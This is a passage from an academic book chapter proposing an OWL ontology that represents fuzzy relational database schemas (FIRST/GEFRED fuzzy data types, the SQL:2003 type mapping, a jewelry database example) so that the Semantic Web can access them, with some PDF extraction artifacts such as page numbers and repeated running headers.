teristics must be explicitly defined to enable this kind of information to be accessed. In addition, we will present an ontology which allows the fuzzy structure of a fuzzy database schema to be represented so that fuzzy data from FDBMS can also be available in the Semantic Web.
INTRODUCTION The Semantic Web is the result of extending the standard Web with languages, information, and resources to enable us to extract information about the meaning of the Web contents automatically (Berners-Lee, Hendler, & Lassila, 2001). This content can be stored in different formats, for example, Web documents, semi-structured sche-
Looking for Information in Fuzzy Relational Databases Accessible Via Web
mas, or dynamic data (Hendler, Berners-Lee, & Miller, 2002) as shown in Figure 1. In the Semantic Web, each information source is extended with a structured representation of its semantics (or its meaning). There are several approximations for this (Finin, Mayfield, Joshi, Cost, & Fink, 2005) but one of the most used representations is the ontology concept. An ontology is a formal description for the discourse domain of a concrete problem, and the intention is for it to be shared between different applications. One of its advantages is that it can be expressed in a language (mostly based on firstorder logic) which can be used for reasoning (Gómez-Pérez, Férnandez-López, & Corcho-García, 2003b; Noy, 2004; Staab & Studer, 2004). A dynamic Web page is a type of Web content which is generated by querying a database (usually using technologies such as JSP, ASP, or
Figure 1. Comparing documents retrieved from the Web and from the semantic Web
2449
Looking for Information in Fuzzy Relational Databases Accessible Via Web
representation can be very useful in the search retrieval process, and alternative result to classical data. Other alternative results can be references to existing databases (when their schemas are known) or client applications which can enrich the resulting answer. Final users could then choose the answers they need. Fuzzy databases representing imprecise information (Blanco, Martinez-Cruz, Serrano, & Vila, 2005b; Ma, 2005) are also part of the information which can be shared in the Semantic Web. This representation allows us to store uncertain and imprecise data together with classical data. However, the difficulty of accessing the database information becomes more complicated when fuzzy information is incorporated into the problem as shown in Blanco et al. (2005b). Agents need to know about the metadata of the fuzzy database in order to search information within it. Representation and manipulation of fuzzy data in the Semantic Web include certain advantages in the Web search. One such advantage is the capability of including fuzzy information in the answers (including fuzzy database schemas), but the main one might well be the new opportunities that this type of information adds to the data integration process from heterogeneous data, format, or sources. The use of fuzzy databases in the Semantic Web, however, is closely connected to its formal representation. An ontology representing a fuzzy database can be seen as an interface (Blanco, Martínez-Cruz, Marín, & Vila, 2005a; Calero, Ruiz, Baroni, Abreu, & Piattini, 2005; Perez de Laborda & Conrad, 2005) between the database and the Semantic Web. This interface separates the data representation from its storage and simplifies its definition for accessing it. The resulting ontology represents the metaclasses that define the information structure (the fuzzy database catalog) and the metaclasses containing the stored fuzzy data (the fuzzy database schema). This ontology can be treated homogeneously with all the ontologies in
2450
the Web, that is, it can be shared, merged, pruned, or evaluated (Gómez-Pérez et al., 2003b). The second section of this chapter briefly describes the main topics relating to fuzzy database integration, and describes various concepts about fuzzy databases and the relation between ontologies and relational databases. In the third section, we propose an ontology as an interface for integrating fuzzy databases into the Semantic Web, and also include an example of a fuzzy schema representation. The final section discusses new trends and presents our conclusions.
BACKGROUND While the Web has brought with it new challenges for exchanging, sharing, publishing, and querying information, it is not without its drawbacks; for example, it does not allow semantics to be included in the data retrieved, query results are huge, searches are imprecise, and so forth (for further details, see Lausen and Stollberg’s work (2004)). Machine-processable information in the Web requires new technologies (Berners-Lee et al., 2001), and some of these technologies are for structuring Web information contents such as XML or XML-S. However: • • •
Web content cannot be determined; Semantic queries cannot be made because Web pages cannot be interpreted; and Intelligent agents cannot obtain significant information.
The Semantic Web was proposed as a solution to these problems, and as many researchers mentioned (Berners-Lee et al., 2001; Goble, 2003), this technology is capable of making the Web information content-understandable and processable by computers and humans. The Web can be extended to include semantics using one of these two approaches (Sheth,
Looking for Information in Fuzzy Relational Databases Accessible Via Web
Figure 2. Semantic Web users and different forms of semantic annotation of Web contents
Ramakrishnan, & Thomas, 2005): ontologies or annotations. The first of these allows the Web content to be represented using the knowledge representation mechanism known as ontologies (see details in the following subsection). This method includes the semantics of the page by attaching the ontology to the page or by including the ontology code in it (Finin et al., 2005). However, McCool (2005) discovered certain problems with this solution, which included: • • • •
complexity of the Semantic Web; poor user participation; development of very poor applications; and restrictive ontology languages.
Figure 2 describes the Semantic Web’s common users and the way in which semantic contents are defined in Web pages. The second solution presents annotations about the Web page content and vocabulary. This solution (McCool, 2006) reduces the complexity of the Semantic Web, retrieves faster query results, and promotes greater participation of Web users and developers. One drawback, however,
is that it lacks the rich expressiveness provided by ontologies. Nevertheless, the Semantic Web remains an alternative to the Classic Web and allows all the information that this contains to be accessed. Web data is represented in many different formats: in the form of documents (e.g., PDF, WORD), as plain text, HTML pages, XML documents, dynamic Web pages (e.g., JSP, ASP, PHP), FLASH contents, libraries, executables, interfaces or front-end pages, and so forth (see Figure 1). We can also find simple data or metadata, access databases, or infer knowledge from them, and we need to define technologies to access all this information in the way and format required for each case. In this chapter, we will attempt to incorporate the information contained in fuzzy databases into the Semantic Web. This information, like classic information, is stored in different DBMSs (DataBase Management Systems) and is represented using schemas. Schemas representing fuzzy and classic information could be retrieved in the Semantic Web as simple data or tuples, and agents and Web users can then use such schemas to search semantic information in DBMSs using SQL Web interfaces. These schemas are also used for integration with other data structures such as ontologies, XML schemas, or other schemas coming from heterogeneous sources.
2451
Looking for Information in Fuzzy Relational Databases Accessible Via Web
Ontologies vs. Databases Many definitions of the ontology concept have been proposed in recent years (Gómez-Pérez et al., 2003b). Studer, Benjamins, and Fensel (1998) define an ontology as a formal, explicit specification of a shared conceptualization, where: • •
• •
formal means that it is machine readable; explicitspecification represents the concepts, properties, relations, functions, constraints, and axioms that are explicitly defined; shared means that knowledge must be consensual; and conceptualization represents the fact that an ontology must be an abstract model and a simplified view of some phenomenon in the world that we want to represent.
This definition summarizes the essence of an ontology. Other definitions for ontologies are very similar to the most referenced one which was given by Gruber (1993) or Guarino (1995, 1998). Ontologies are introduced in the Semantic Web as the main mechanism for describing the content of a Web page (Chandrasekaran, Josephson, & Benjamins, 1999). This description can be made using different languages (Duineveld, Stoter, Weiden, Kenepa, & Benjamins, 2000; Gómez-Pérez, Férnandez-López, & Corcho-García, 2003a; Su & Ilebrekke, 2002). Most of these are based on first-order logic (FOL) (such as OWL (Antoniou & Harmelen, n.d.), RDF (Resource Description Framework (RDF), 1999), KIFF, etc.) and make the definition process very tedious. The most popular are the frame-based languages implemented in ontology management systems (OMS) such as Protégé (Stanford Medical Informatics at the Stanford University School of Medicine, n.d.), WebOde (Arperez, Corcho, Fernandez-López, & Gómez-Pérez, 2001; Ontological Engineering Group (OEG) from the Artificial Intelligence Department of the Computer Science Faculty (FI) from the Technical University of Madrid (Spain),
2452
n.d.;), Ontolingua (Stanford University, n.d.), or WebOnto (Open University, n.d.) amongst others. There are, however, drawbacks to all representation methods. FOL-based languages are too complex to be managed, but they are very good at inferring knowledge, and they are independent of the application tool. OMS, meanwhile, represent a very easy ontology development interface, but representations are deeply dependent on the tool. On the other hand, these systems do allow translations to be made into most FOL languages, thereby avoiding syntax mistakes. A detailed classification of ontology representation techniques can be seen in Partners (2004). Several classifications of ontologies have been given by many authors (Lassila & McGuinness, 2002; Roche, 2003; Steve, Gangemi, & Pisanelli, 1998), and in particular we would like to mention Guarino’s (Steve et al., 1998) categorization due to its simplicity, and Lassila and McGuinness’s (2002), which has become a reference metric to define what can be considered an ontology or not. In Gómez-Pérez et al. (2003b), there is a brief summary of these classifications, whereby they are divided into those based on the internal structure or on the subject of conceptualization. This categorization (a brief resume of this is shown in Figure 3) highlights the representation ontologies that define the frame where the remaining ontologies can be defined. General ontologies represent general common knowledge about a certain subject, and domain ontologies allow us to define knowledge about a specific domain. Ontologies should provide consensual knowledge about a certain domain or area, and theoretically, these should be shared and populated so that this knowledge can be interchanged by the community. Such ontologies would allow common applications to be developed thanks to their compatible formats. Current work, however, demonstrates that each enterprise, project, or study develops its own ontology, uses its own language, and implements its own applications. General purpose ontologies (such as CYC (Lennat, 1995))
Looking for Information in Fuzzy Relational Databases Accessible Via Web
Figure 3. Basic Ontology Categorization
failed due to their low acceptance (McCool, 2005; Noy & Hafner, 1997). New trends in ontology representation are leading towards the integration of ontologies using matching and mapping processes (Choi, Song, & Han, 2006). A large number of database matching algorithms and studies have been revived in order to use similar developments with ontologies (Hai, 2005; Ma, 2005; Mena & Illarramendi, 2001; Staab & Studer, 2004). There is a great deal of debate about whether databases can be considered like ontologies when they represent concrete domain knowledge. Some trends consider database schemas to be lightweight ontologies (Breu & Ding, 2004; Gómez-Pérez et al., 2003b; Noy, 2004) because they lack the axioms which allow inferences to be made. Another considers ontologies and databases to be very similar, but they are not developed to represent the same aspect of the domain (Unchold & Gruninger, 2004). We consider database schemas to represent knowledge as ontologies do, but the resulting hierarchy could be a little flat, and logical axioms could represent different kinds of restrictions (these are database constraints). In general, however, they can be used to share stored information with the other Semantic Web users and agents, and to profit from the new technologies developed around ontologies.
A large number of proposals have been developed to enable database schemas to be accessed using ontologies. Most of these representations focus on populating the DB information in the Semantic Web. These approaches only use relational schemas as a back-end system for retrieving data from databases through ontologies as a query interface (An, Borgida, & Mylopoulos, 2004; Barrasa, Corcho, & Perez, 2003; Bizer, 2003; Dou & LePendu, 2006). The majority of these proposals define a declarative markup language for making the translation. Another uses a traditional closed program that establishes the mapping between the ontology and the database schema (such as Data Genie (Gennari, Nguyen, & Silberfein, n.d.)). Obviously this last choice is deeply dependent on the system and is non-scalable. However, the language-based method is more independent of the system, but programs also carry out the translation. Another kind of proposal is that which attempts to represent database metadata (the schemas) as ontologies. In Perez de Laborda and Conrad (2005), Perez de Laborda proposes the definition of only a few of the basic relational structures as a meta-ontology in order to communicate peer-topeer databases. Trinh, Barker, and Alhajj (2006) define most of the relational database structures as an ontology, and this representation includes
2453
Looking for Information in Fuzzy Relational Databases Accessible Via Web
the DB constraints definition as the semantic restriction of the ontology. Another proposal is Sujatha et al.’s (Upadhyaya & Kumar, 2005) which represents relational database schemas using a tool that translates them into OWL. All these proposals define their ontologies using OWL. Dou, LePendu, Kim, and Qi (2006) develop a process for representing the main relational database structures in the Semantic Web, and this proposal is based on its own declarative language. Calero et al. (2005), on the other hand, described its own ontology using UML (they represented the ANSI Standard SQL 2003 (Information Technology Database Languages SQL, Parts 1 to 4 and 9 to 14, 2003)) and used it in order to represent relational database schemas. Another approach (Ontobase (Yabloko, Len, & Next Generation Software, n.d.)) develops a tool that automatically represents database contents as a meta-ontology. Ontobase is a Protégé plugin that imports database schemas to the protege representation format. In our proposal, we use Calero et al.’s (2005) ontology for representing the Standard ANSI SQL 2003. In addition, predefined data types are defined in this ontology proposal explicitly, and fuzzy data representation structures are also added to this ontology. This inclusion enables a formal definition to be made of the data structures required for representing fuzzy data in an RDBMS (relational database management system). The following section describes the extension of an RDBMS, before presenting the solutions adopted to make this information accessible in the Semantic Web.
Fuzzy Databases: FIRST Proposal Many extensions to the relational model have been proposed since Zadeh (1965) introduced the concept of fuzzy sets for representing fuzzy data, and a summary of these extensions can be found in Ma, 2005, 2006; Petry, 1996; Chen, 1999; Medina, Pons, and Vila, 1994; and Galindo, Urrutia, and Piattini, 2006). One of the extensions
2454
mentioned consists in adding a membership degree in a tuple as proposed by Baldwin and Zhou (1984) and Raju and Majumdar (1988). Buckles and Petri (1982) and Shenoi and Melton (1989) replace the equivalence between domain values by measures of nearness such as similarity and proximity relationships, respectively. Prade and Testemale (1984) use possibility distributions for attribute values, and Umano and Fukami (1994) add the concepts of non-applicable information. Zemankova and Kaendel use the possibilistic model and a language to represent certainty and similarity relationships. Kacprzyk and Zadrozny (2001) and Rodríguez (2000) propose a language for fuzzy querying. Rundensteiner, Hawkes, and Bandeler (1989) and Chen, Vandenbulcke, and Kerre (1992) use possibility distributions and resemblance relations in the relational databases simultaneously. This representation is also used in Ma (2005) and in Medina et al. (1994), where the possibility value of each tuple in a fuzzy relation is exactly 1. In this last work, Medina et al. (1994) summarize most of the characteristics of the extensions listed above. In Medina et al. (1994), Medina introduces GEFRED (a fuzzy data representation model) and FIRST (an architecture definition in a real RDBMS in (Medina, Vila, Cubero, & Pons, 1995)). This architecture defines new fuzzy data types and operations enabling the system to make fuzzy queries to the database using an extension of SQL called FSQL (Carrasco, Vila, & Galindo, 2003). An implementation for all relations in the system catalog and an example of how structures can be stored in the database are described in detail in Medina et al. (1995). In order to represent all the values in a generalized fuzzy domain, various authors entered the following three new data types into a classic RDMBS (Medina et al., 1995): 1.
Fuzzy Data Type 1, or CRISP data type, which represents those attributes storing classical data which can be fuzzy queried;
Looking for Information in Fuzzy Relational Databases Accessible Via Web
2.
3.
Fuzzy Data Type 2, or POSSIBILISTIC data type, which represents those attributes storing fuzzy data represented using trapezoid possibility distributions (among others) defined on a numerical domain; and Fuzzy Data Type 3, or SCALAR data type, which allows attributes storing fuzzy data to be represented using resemblance relations defined on a non-numerical domain.
The aim of this extension is to provide a new set of capabilities to a classical RDBMS. This may be achieved when all accesses to relations in the data catalog are intercepted so the new types and relations can be processed. Some new data catalog relations involved in this processing have therefore been defined, and this new set has been named the fuzzy meta-knowledge base (FMB). Each FMB relation is described below: 1.
2.
3.
4.
5.
6.
FUZZY COL LIST relation, storing information about attributes of relations that can contain fuzzy data or can be fuzzy queried; FUZZY OBJECT LIST relation, storing common information about all the fuzzy concepts stored in the database such as labels; FUZZY LABEL DEF relation, storing the possibility distribution related to every fuzzy label defined in the database; FUZZY APPROX MUCH relation, storing information for designing possibility distributions on predefined fuzzy concepts in the database such as greater than, much greater than; FUZZY NEARNESS DEF relation, storing information about similarity relations between every pair of values of a fuzzy data type 3 attribute; and FUZZY QUALIFIERS DEF relation, storing the minimum threshold that is assigned to every qualifier and is defined on a linguistic label.
A fuzzy database schema, however, only uses two of these sets of relations in its definition: FUZZY COL LIST relation (used whenever a fuzzy attribute is defined in the system) and FUZZY APPROX MUCH relation (used when a Fuzzy Data Type 2 is defined in order to establish restrictions on its domain). The remaining relations are defined to store concrete information, that is, labels and discrete values used in the tuples definition (but this representation is not in the scope of this chapter).
Integration of Information A great number of systems have already been developed to enable a wide variety of data from many different sources to be integrated. Ontology integration (Choi et al., 2006; Hameed, Preece, & Sleeman, 2004; Noy, 2004) is one of the main goals because of the increasing number of these representations today. Yet it is not the only application area since the Semantic Web has facilitated access to many different kinds of information represented in different formats and even in different languages. Some examples of these different schema types are: relational schemas (represented with SQL), XML (using document type definition and XML schema definition), document schemas, and ontologies (using OWL or RDF) (Hai, 2005). The integration of information is not, therefore, a simple problem. George (2005) summarizes several kinds of schema heterogeneity and dimensions of integration, and establishes three dimensions: 1.
2.
System Integration, representing the heterogeneity in the platform where the information is represented; Schema integration, representing the heterogeneity between schemas. He identifies five tasks in this process: (a) pre-integration: schema translation into common data model form; (b) comparison: process of semantic
2455
Looking for Information in Fuzzy Relational Databases Accessible Via Web
3.
conflict identification; (c) conformance: making conflicts compatible for merging by similar representation; (d) merging: integrating schemas; and (e) restructuring: refining schema; and Semantic Integration, resolving differences in conceptual data representation by determining equivalence between schema constructs.
Although most approaches for integrating information are based on schema integration techniques from database disciplines, there are certain differences between ontologies and databases, as outlined by Kalfoglou and Schorlemmer (2003), and the two approximations in the process for integrating schemas are: local as view, and global as view (Goguen, 2005). Global as view deals with establishing a generic domain representation (a global schema) where local schemas map to the global schema; this technique is widely used (Aparcio, Farias, & dos Santos, 2005). Meanwhile, local as view implies to establish direct correspondences among different local schemas. There are various proposals for schemas and ontology matching. For example, MAPONTO (An et al., 2004) is a tool that uses logic to establish mappings between ontologies and relational databases. COMA++ (Aumueller, Do, Massmann, & Rahm, 2005) is a tool that solves matching problems between schemas and ontologies written in different languages such as SQL, W3C XSD, and OWL. GLUE (Doan, Madhavan, Domingos, & Halevy, 2002) or Ontomap (Gal, Modica, Jamil, & Eyal, 2005) are other examples of tools used for automated schema matching. In this work, we attempt to establish a frame in order to develop a tool for integrating fuzzy database schemas with the remaining structures found in the Semantic Web, and we have therefore identified two dimensions in this frame:
Due to the specific characteristics of the final dimension, semantic integration, it will be studied once the previous two dimensions have been developed. The global as view approximation, however, will be used to establish correspondences between different schemas. A fuzzy DB schema representation would then set up a flexible global schema where local schemas map to it. An ontology for representing a fuzzy database representation is presented in the following section.
USING AN ONTOLOGY TO REPRESENT FUZZY DATABASES IN THE SEMANTIC WEB Fuzzy DBs add semantics to the information in the database, making it more interesting and valuable, and enabling it to be queried and stored more flexibly. For this, the structure that represents the fuzzy information (metadata) should be published and formally defined, so users or intelligent agents can therefore access and exploit it automatically. The Semantic Web is enriched by integrating this kind of information into its query results. Fuzzy extensions to the relational database model, however, are not a new problem. The definition process of fuzzy information on the
Looking for Information in Fuzzy Relational Databases Accessible Via Web
system is not as direct as the definition of the classic one, and good knowledge about how the catalog has been extended so as to define fuzzy data is a basic user requirement. The problem is accentuated when new data types, structures, or representations are included in the fuzzy system, making the catalog hard to manage. This is the case studied in Blanco, Martinez-Cruz, et al. (2005b) where fuzzy RDBMS are extended in order to manage logical rules for making deductions with fuzzy data, to make deductions, and to represent data mining operations using fuzzy data. As we mentioned before, the catalog structures required for representing fuzzy datatypes need to be explicitly defined in the RDBMS. Moreover, the defined schemas of the fuzzy databases need to store information in the catalog so that the system can manage the database properly. The description of this extra fuzzy information prevents the use of already-developed tools for interchanging information between RDBMS. These problems make processes like sharing, merging, recycling, comparing, sending, or ex-
ploiting schemas or information more difficult than we could wish for. Figure 4 represents the problem of integrating fuzzy DB schemas with other representation models or technologies. Section A represents how an FDB schema must establish individual mappings in order to share its contents. The solution to this problem is shown in Section B. This consists in defining an interface that keeps the knowledge representation (logical model) of the fuzzy schema aside from its storage place (DBMS). The mapping must then be defined once from the ontology to the destination resources. This interface uses an ontology that formalizes the SQL standard including the fuzzy data types defined in the GEFRED model (Medina et al., 1994). In addition, this proposal extends the SQL standard for defining fuzzy tables and columns. Instances of the proposed ontology store the definition of the database schemas, the domains of the attributes, and their default values. These schema representations are therefore independent of any concrete RDBMS representation.
Figure 4. Solution to the fuzzy data representation problem
2457
Looking for Information in Fuzzy Relational Databases Accessible Via Web
The ontology representing the extended Fuzzy RDBMSs (FRDBMS) also uses OWL (Ontology Web Language) (Antoniou & Harmelen, n.d.) so that it is accessible on the Web and understandable by most agents and currently-developed applications.
Ontology Description The ontology that defines the extension of the SQL 2003 standard for representing fuzzy data can be divided into the following two sub-ontologies: fuzzy data type ontology, and fuzzy schema ontology.
Fuzzy Data Type Ontology The SQL standard (in particular, the SQL:2003) defines three kinds of data types: predefined types (also known as ”built-in data types”), constructed data types, and user-defined data types (more details can be found in ANSI/ISO/IEC International Standard (IS) Database Language SQLPart 2: Foundation (SQL/Foundation), 1999; Calero et al., 2005; Information Technology Database languages SQL. Parts 1 to 4 and 9 to 14, 2003), and these data types have already been represented using different knowledge representation methods. While one of these is based on the use
Figure 5. Taxonomy of predefined SQL data types with an extension with fuzzy data types in dashed line, and fuzzy data type ontology (Pardede & Wenny Rahayu, n.d.)
2458
Looking for Information in Fuzzy Relational Databases Accessible Via Web
of an ontology to model all the SQL:2003 data types using UML notation (Calero et al., 2005), this representation lacks an explicit representation of the predefined data types that can be found in Pardede and Wenny Rahayu (n.d.) and in Figure 5, section A. Fuzzy data type representation, however, is not included in any of these. Rather than modifying the SQL standard data types, the proposed ontology extends them and in Figure 5, section A, they are represented by a dashed line. The extended hierarchy of the ontology is shown in Figure 5, section B, where both the standard data types (those which are on the first level of the Pardede hierarchy) and also the fuzzy data types defined in the FIRST architecture are represented. Fuzzy data types and the relations established with the predefined datatype hierarchy are given in further detail. There is a direct correspondence between the predefined SQL data types and data types represented with OWL, as shown in Table 1.
Fuzzy Schema Ontology A sub-ontology represents the SQL standard schema that allows any relational database schema to be maintained independently of its DBMS implementation. Once the schema has been loaded into the ontology as a set of instances, it can be imported or exported to another DBMS. It can even be exported into the Web so that its knowledge representation can be shared. Calero et al.’s (2005) representation models the SQL:2003 standard schemata as an ontology using UML notation, and an OCL language to define the constraints. The ontology is therefore translated into the OWL language once it has been adapted to represent fuzzy database structures. The class Column is classified into two subclasses: Base Column and Fuzzy Column (as mentioned in Figure 6), where the first represents classic columns and the second represents all the fuzzy
Table 1. Correspondence between SQL data types and XML data types SQL Data Type
XML Data Type
Facet
String, Bit, Fixed
xsd:hexBinary or xsd:base64Binary
no facet
String, Bit, Varying
xsd:hexBinary or xsd:base64Binary
xsd:maxLength
String, Character, Fixed
xsd:String
xsd:length
String, Character, Varying
xsd:String
xsd:maxLength
String, Character, Clob
xsd:String
xsd:maxLength
Boolean
xsd:boolean
no facet
Interval
xsd:duration
xsd:pattern
Numeric, Exact, Numeric
xsd:decimal
xsd:precision, xsd:scale
Numeric, Exact, Decimal
xsd:decimal
xsd:precision, xsd:scale
Numeric, Integer
xsd:integer
xsd:maxInclusive, xsd:minInclusive
Numeric, SmallInt
xsd:integer
xsd:maxInclusive, xsd:minInclusive
Numeric, BigInt
xsd:integer
xsd:maxInclusive, xsd:minInclusive
Numeric, Approx, Real
xsd:float, xsd:double
no facet
Numeric, Approx, Double Precision
xsd:float, xsd:double
no facet
Numeric, Approx, Float
xsd:float, xsd:double
no facet
DateTime, Date
xsd:date
xsd:pattern
DateTime, Date
xsd:time
xsd:pattern
DateTime, T.Stamp
xsd:dateTime
xsd:pattern
2459
Looking for Information in Fuzzy Relational Databases Accessible Via Web
attributes. Fuzzy attributes do not relate to any constraint class because they cannot be a foreign key or primary key in the schema. The original Calero ontology, on the other hand, is pruned, and the resulting ontology lacks representation of the SQL objects since these are not necessary to reach our goals. A brief sample of the resulting ontology (represented in the OWL language) is shown in Figure 7 and Figure 8. Figure 7 shows the code for describing the Fuzzy Column Class, its attributes, relations, and constraints. In this ontology tables and column classes are defined as metaclases (both are sub-classes of owl: class). These metaclasses allows us to define all the tables and attributes described in the schema as classes. Figure 8 describes the class Table and shows the definition of this characteristic. Both sub-ontologies are connected by means of a specific property that joins the classes Datatypes and Columns as in Calero et al. (2005). The re-
Figure 6. Fuzzy schema ontology
2460
lation hasDataType establishes the connection between datatypes and columns. This connection is represented in Figure 6. The translation process of this ontology from UML representation into OWL is direct. The following matching rules are shown: • • • • • •
UML classes as ontology classes; UML attributes as datatype properties; UML relations as object properties; UML cardinality relations as cardinality restrictions; UML closed values as owl:oneof restriction; UML logical restrictions as Boolean restrictions (e.g. owl:unionOf )
More detailed correspondences between OWL and UML are explained in Falkovych, Sabou, and Stuckenschmidt (2003); and Brockmans, Volz, Eberhart, and Loffler (2004).
Looking for Information in Fuzzy Relational Databases Accessible Via Web
Figure 7. Fuzzy column class represented in OWL
Figure 8. Table class represented in OWL
Example
described in this example for reasons of space. Surprisingly, diamonds have always had fuzzy attributes among their features. Some of their characteristics are normally represented with linguistic labels, for example, clarity and color attributes. Table 3 and Table 4 shows these labels, respectively. As we can see, a fuzzy representation would allow these labels to be inferred, giving a membership degree when a precise value is not known.
In this section, we will show an example of a database schema that includes fuzzy attributes in its definition. The selected example is a jewelry database (Figure 9) which represents the gemstones contained in their jewelry. We present a semi-completed schema (since the classes of all existing gemstones are not represented). Only some of the most significant elements will be
2461
Looking for Information in Fuzzy Relational Databases Accessible Via Web
Figure 9. Example of fuzzy database schema
Table 3. Labels for representing diamond clarity Label
Table 4. Labels for representing diamond color
Description
Label
Description
FL
Flawless
D, E, F
Colorless
IF
Internally Flawless
G, H, I, J
Nearly colorless
VVS(VVS1,VVS2)
Very very small internal inclusions
K, L, M
Faint Yellow
VS (VS1, VS2)
Very small internal inclusions
N, O, P, Q, R
Very Light Yellow
SI (SI1, SI2, SI3)
Small inclusion
S, T, U, V, W, X, Y, Z
Light Yellow
P
Piqué
I (I1,I2,I3)
Imperfect
Even more generic labels can be generated in order to facilitate valuation by using a degree. For example, if we say that a diamond has the color Yellow with a degree of 0.5, then we can infer that it is type W. These attributes can therefore be defined as Fuzzy Data Type 3, that is, using discrete values with a similarity relation between them. Although the diameter of a ring has a numeric value, a ring size can also be defined using linguistic labels in order to establish generic sizes (e.g., S, M, L, XL, XXL), which is why this is a Fuzzy Type 2 attribute. Fuzzy Type 1 is defined when we want to fuzzily query on this attribute, but its values cannot be fuzzily stored. This situation could occur in the price attribute in the jewelry database, for example, if we want to know which rings are considered “cheap”. 2462
The resulting ontology of the jewelry schema consists of a set of instances of the previously defined ontology. Various parts of the OWL code show how this schema is represented below. Figure 10 and Figure 11 represent instances of the classes Table, Columns, and Datatypes, respectively.
Applications Developing fuzzy schemas as ontologies is an attempt to facilitate the integration information process between fuzzy databases and other representations. As described in the previous sections, fuzzy databases have their own representation and languages, which further complicates the use of developed schema mapping tools. In this work, various operations relating to fuzzy database integration have emerged (as
Looking for Information in Fuzzy Relational Databases Accessible Via Web
Figure 10. Instantiation of class table in OWL code and class columns
shown in Figure 12), and these basically consist of: • •
•
Exporting a schema to several heterogeneous DBMS (as shown in Figure 12, section A); Interchanging data between different homogeneous schemas or DBMS DBMS (as shown in Figure 12, section B); and Integrating different schemas from heterogeneous sources into a single merged schema DBMS (as shown in Figure 12, section C).
This last one is the most complex problem to resolve, and many approaches have been proposed
for this. The main difficulty in resolving this problem is due to the enormous variety of schema (as mentioned in the previous section). Nevertheless, fuzzy database schema integration could not increase the complexity of this problem due to the flexibility of the data represented in them.
DISCUSSION Although there are a large number of approaches for representing fuzzy data in database management systems, this information has not transcended from the database discipline. Current knowledge 2463
Looking for Information in Fuzzy Relational Databases Accessible Via Web
Figure 11. Instantiation of class datatypes in OWL code
representation mechanisms, such as ontologies, represent relational database schemas in many formats, but they all store classical information, and it is extremely difficult to find the fuzzy data representation structures in the fuzzy database environment. In this chapter, we have proposed an ontology for such schemas and this definition helps fuzzy database users access its information using new data management techniques such as the Semantic Web. Our following task is to develop a framework that will allow us to represent the domain ontology defined by the instances of this ontology. These instances that represent a FDB schema would be transformed into a new domain ontology, and this ontology should have classes, properties, and restrictions represented as a hierarchy. This
2464
representation is obviously closely related to a relational database structure although its instances are directly related to the tuples in the represented database. On the other hand, special structure definitions are required in order to store fuzzy values in the ontology. For example, distribution functions should be able to be defined as the varying string structure is. The defined ontology can be considered as a general ontology (or perhaps a meta-ontology) due to the metaclasses that it contains. This is the case of the classes Table and Columns. When these classes are instantiated, new classes should be generated in order to allow the tuples relating to them to be defined. More applications can be found using the representation of fuzzy schemas as ontologies.
Looking for Information in Fuzzy Relational Databases Accessible Via Web
Figure 12. Schema exportation to several DBMS
These schemas are more flexible in the integration process due to the flexibility of their elements. Uncertain or imprecise data are not very restrictive when a matching rule attempts to map one representation to another, and so sometimes a membership degree is the only requisite. Fuzzy database schemas also enrich the heterogeneity of the Semantic Web. New database content can
be reached and processed computationally if required. Public descriptions of databases (with fuzzy or classical data) are necessary in the Semantic Web, and allow access to database information that is not available as an HTML Web page. This happens because database owners do not always want to develop a back-end interface for Web access although their databases are available to the public. New opportunities for developing applications (or services) enabling automatic access to public database content will emerge. Fuzzy schemas have been represented as an ontology using the OWL language because it is independent of a tool or a concrete representation structure. It has also been defined as standard by the W3C, and most tools representing ontologies can read and handle this format. OWL, however, is a complex language with extremely lengthy definitions. Hand-written OWL code is a very tedious process and it is very easy to make mistakes when writing it. Most OWL ontologies are developed by using an ontology management tool and then translating them. Another option is to develop an OWL editor. Although there are several tools for working with OWL ontologies, we choose JENA (Programme., n.d.) because it provides a welldocumented API for managing OWL elements. There are libraries such as OWL API (Bechhofer, n.d.) or SESAME (Kampman & Broekstra, n.d.) but these are less intuitive than JENA. Another alternative is to develop a plugin in an existing ontology management system, but this has not been done as all these tools use their own local representation structures. This work only attempts to extend the contents of the Semantic Web rather than to analyze the poor success of the Semantic Web to date. There have been many developments in the framework of ontology definition and knowledge representations, but as McCool (2005) analyzed in his work, not enough applications or services have been developed so far. This proposal is therefore
2465
Looking for Information in Fuzzy Relational Databases Accessible Via Web
expected to be used by a large number of Semantic Web clients in the near future.
CONCLUSION Although integration techniques and tools for reconciliating schemas from heterogeneous sources (included DB) have often been proposed, there is no information about how to represent the fuzzy data stored in fuzzy database management systems in order to make it accessible in the Semantic Web. This work proposes a frame for representing fuzzy schema structures as ontologies. This work also represents new advantages in the information retrieval process in the Semantic Web, since they enable an ontology to be used to retrieve schemas from all types of databases. This information is used to access public databases by means of client interfaces which are available online. This access can be made by the end users or automatically by agents. By treating the schemas represented with this proposal as ontology data, users can then exploit them with all of the developed technologies for managing ontologies, and some of the operations that can be performed with ontologies are: comparing, pruning, importing, exporting, evaluating, integrating, mapping, merging, alignment, reasoning, and so forth.
REFERENCES An, Y., Borgida, A., & Mylopoulos, J. (2004). Refining mappings from relational tables to ontologies. Proceedings of the VLDB Workshop on the Semantic Web and Databases (SWDB ‘04) (pp. 57-62). ANSI/ISO/IEC International Standard (IS) Database Language SQL, Part 2: Foundation (SQL/ Foundation) (1999). ISO/IEC 9075-2:1999 (E).
2466
